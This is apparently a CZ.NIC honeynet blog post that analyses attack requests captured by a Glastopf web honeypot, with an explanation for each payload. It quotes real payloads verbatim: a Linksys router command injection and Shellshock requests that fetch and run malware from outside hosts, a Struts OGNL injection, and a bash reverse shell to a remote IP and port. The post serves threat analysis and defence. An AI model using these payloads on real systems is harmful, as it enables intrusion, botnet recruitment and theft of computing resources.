Attacks on the web honeypot

Honeynet operated by the CZ.NIC association certainly does not have to be particularly introduced to the readers of this blog. Besides articles on this blog there are also accessible source codes of operated honeypots which you can see on our GitLab. In today´s article we will focus on attacks caught on the web honeypot Glastopf.

More types of login can be used in Glastopf. We use the following two ones:

  • text log into which data about IP address of the attacker, method and URL requirement are stored
  • database log where the complete requirement of the attacker is stored (includes also a head), thus e.g. data about coding, language, user-agent, etc.; in this case it is a big advantage that we can see also the body of the requirement.

This body of the requirement is very frequently partially or totally coded by URL coding (it includes the character % and two hexadecimal characters).

We consequently looked into the database and found out several basic types of attacks.

1st type of attack

After URL decoding we obtained the following:
(we add new lines for easier reading in the text)

POST /tmUnblock.cgi HTTP/1.1
Content-Length: 1036

submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&
ttcp_ip=-h `
cd /tmp;
echo "#!/bin/sh" > .d7aac923.sh;
echo "wget -O .d7aac923 http://70.115.201.195:3200" >> .d7aac923.sh;
echo "chmod +x .d7aac923" >> .d7aac923.sh;
echo "./.d7aac923" >> .d7aac923.sh;
echo "rm .d7aac923" >> .d7aac923.sh;
chmod +x .d7aac923.sh;
./.d7aac923.sh`
&StartEPI=1

/tmUnblock.cgi is CGI executable file in some Cisco Linksys routers. It is vulnerable to “remote command execution“ (RCE) / “blind command injection“, in this case called “The Moon“.

The attacker scripts the loading of the file from URL http://70.115.201.195:3200, adds rights to starting, afterwards starting itself and deleting. In the end only a script and running malware in the memory remain of it.

At the time shorter than 24 hours after the catching of the attack, the file is not found in the mentioned URL.

2nd type of attack

After URL decoding we obtained the following:

POST /index.action HTTP/1.1
Expect: 100-continue
User-Agent: Mozilla/5.0

redirect:${
#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),
#res.setCharacterEncoding("UTF-8"),
#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
#res.getWriter().print("dir:"),
#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),
#res.getWriter().flush(),
#res.getWriter().close()}

The matter concerned is the vulnerability of framework after creating Java web applications Apache Struts 2, concretely again RCE parameters in front of which there are chains “action:“, “redirect:“, or “redirectAction:“.

By this progress, the attacker wants to achieve the writing of the directory in which the web application is started.

3rd type of attack

Since 25th September we noticed 586 requirements which included the attack of the Shellshock type. The following types of attacks try to misuse this concrete vulnerability, each type, however, in a bit different way.

GET /cgi-bin/bts.cgi HTTP/1.0
User-Agent: () { :;}; /bin/bash -c "
cd /tmp;
wget http://100.42.30.34/sac ;
curl -O http://100.42.30.34/sac ;
perl sac ;
rm -rf sac"

GET /cgi-bin/btw.cgi HTTP/1.0
User-Agent: () { :;}; /bin/bash -c "
cd /var/tmp ;
rm -rf sa* ;
wget http://100.42.30.34/lex1 ;
lwp-download http://100.42.30.34/lex1 ;
curl -O /var/tmp/lex1 http://100.42.30.34/lex1 ;
perl /var/tmp/lex1 ;
rm -rf /var/tmp/lex*;
rm -rf lex1"

The first requirement is from 13th November, the second requirement or those ones similar to it were noticed on 14th, 15th and 21st November. I will describe here only the second requirement, because it is slightly more complicated, but the idea of both these requirements is the same.

The attacker deletes first of all all files starting with the chain´sa´ in /var/tmp.

The attacker further tries to load in three different ways (wget, lwp-download and curl) the pearl file. He/she consequently starts and deletes it. It is LinuxNet perlbot which is connected to irc, contains subroutines for tcp and udp flood or port scanner.

There are various kinds of perlbots at the Internet. If you wanted to read more in detail, we would recommend you a nice analysis of a similar perlbot which spread through vulnerability in PHP.

4th type of attack

GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
Connection: close
Cookie: () { ignored;};/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1
User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1

We will analyse the following link

/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1:

  • /bin/bash -i starts the interactive shell and
  • >& redirects the standard output and the standard error output
  • /dev/tcp/207.240.10.1/8888to socket opened on TCP connection to the address 207.240.10.1 and port 8888
  • 0>&1 redirects the standard input into the standard output.

This shell consequently accepts input (commands) from socket /dev/tcp/207.240.10.1/8888 and the standard output and standard error output are also redirected to this socket. Thanks to it the attacker sees the outputs from the commands which he/she started at the attacked computer.

5th type of attack

From 27th to 30th October we noticed only from 2 IP addresses, but to various URL predominantly with CGI, 504 such requirements.

GET / HTTP/1.0
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
Pragma: no-cache
Referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
Test: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
User-Agent: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl

URL is no longer actual, but on archive.org its content still can be found. It looks for short like this:

#!/usr/bin/perl
use MIME::Base64;
eval (decode_base64('velmi dlouhý base64 zakódovaný string'));

If we change eval for print and start script, we find out that the matter concerned is DDoS Perl IrcBot in 1.0 from the year 2012. This script is able to be connected e.g. to IRC, flood, scan ports and send e-mails.

6th type of attack

GET / HTTP/1.0
User-Agent: () { :;}; /bin/bash -c "
wget http://stablehost.us/bots/regular.bot -O /tmp/sh;
curl -o /tmp/sh http://stablehost.us/bots/regular.bot;
sh /tmp/sh;
rm -rf /tmp/sh"

The last example of Shellshock attacks appeared almost a month ago and its URL is still funcional. It contains shell script which the attacker consequently starts and deletes.

Script is installed by Primecoin miner. The user name and password can even be seen.

Miner tries to hide in such a way that it is copied to /usr/local/bin/spamd, this file is consequently started.

This list is definitely not complete and it changes in time according to actual vulnerabilities in the used software. Also for this reason we will certainly come back to this topic after some time.

Author:

Leave a comment